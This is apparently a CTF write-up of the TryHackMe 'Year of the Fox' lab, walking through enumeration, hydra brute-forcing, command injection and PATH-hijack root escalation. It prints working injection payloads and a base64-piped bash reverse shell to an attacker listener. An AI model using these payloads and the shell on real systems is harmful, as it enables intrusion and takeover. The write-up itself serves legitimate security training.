TryHackMe: Year of the Fox

Don’t underestimate the sly old fox… This room includes a competition with over $4,000 worth of prizes to celebrate TryHackMe hitting 100k members!

I know everyone struggle for this room a lot including me haha. Enjoy this writeup!

Enumeration

Let’s do nmap first and see what do we get.

80/tcp    open     http        syn-ack ttl 61 Apache httpd 2.4.29
139/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)

Port 139 & 445 (Samba)

First of all, let's enumerate more information from Samba using enum4linux.

enum4linux -a <ip>
Enum4linux (Share Enumeration)
Enum4linux (Users)
Enum4linux (Enumerate Users)

So we got 2 possible users who are fox and rascal. You can try crack the smb using fox user but to save your time no need :p

#Bruteforce SMB 
hydra -l fox -P <wordlist> -m <domain> <ip> smb
=> Or you can use metasploit :)

Port 80 (Http)

When we open the webserver we encounter a pop-up box that required authentication.

Burpsuite (Authentication)

Since we know that there are 2 possible users we can try both using hydra. But to save your times do it on rascal haha. If http-get not working you can try use http-head.

#http-get
hydra -l rascal -P <wordlist> -f <ip> http-get /
#http-head
hydra -l rascal -P <wordlist> -f <ip> http-head /

The password will rotate in this room so all the best :)

Hydra (Password found)

Rascal Search System

Finally, we are able to see this page! But it does not stop here. So we are able to search for files and we found out that there are 3 files inside here.

Rascal’s Search System

By using Burpsuite I try to check if in case we can try to do LFI but its not working. So by using wordlist of the symbol I found that \ works.

Burpsuite (intruder)

By using the wordlist of command injection from the Github that I found. We are able to see interesting results. Here are the commands that I found working.

#Command Injection
{"target":"\" ;id\n"}
{"target":"\" ;/usr/bin/id\n"}
{"target":"\" \n/usr/bin/id\n"}
{"target":"\" \n/bin/ls -al\n"}

Okay this getting more interesting xD So I try to get the web flag using this command

#Web Flag
{"target":"\" \ncat ../../../web-flag.txt\n"}

Reverse Shell

I try a lot of ways to get a reverse shell and finally I got it :’) Follow the steps below.

#Reverse Shell that I use (Convert to base64)
bash -i >& /dev/tcp/<ip>/<port> 0>&1
#Run this command while listen
{"target":"\" \necho <base64> | base64 -d | bash\n"}
Reverse Shell

First User (fox)

So we found a few files but it seems not working anywhere.

Files Found

When we run linpeas, we found out that there is a port 22 open here. If we remember correctly there is no port 22 open when we nmap.

Linpeas Results

Lets port forward port 22 using socat.

./socat tcp-listen:<port>,fork tcp:127.0.0.1:22 &

To check if its working or not we can try nmap it again.

Port ssh open

Lets bruteforce again using hydra with fox user.

hydra  -l fox -P <wordlist> -f <ip> ssh -s 9999
Hydra Bruteforce SSH

Finally, we got fox!

Fox Shell

Root

So when I try sudo -l we see that there is permission with the shutdown as a root. So lets transfer file using nc (upload your own binary nc)

#Receive
./nc -l -p 1234 > out.file
#Sending
./nc -w 3 <ip> 1234 < /usr/sbin/shutdown

After done with the transfer, lets strings and take a look if there is something interesting that we can exploit.

Inside shudown

So is it using power off inside shutdown? So let us use PATH variable to escalate privileges.

#Create poweroff
echo /bin/sh > poweroff
chmod 777 poweroff
export PATH=/tmp:$PATH
then run again

So let's try to run it and we got our shell!!

Root Shell

To get the root file we can find it using this command:

find / -type f -iname '*root*' 2>/dev/null

Congratulations to TryHackMe for 100K members!!!

CTF Player 🚩 || TRYHACKME || HACKTHEBOX || VULNHUB || STUDENT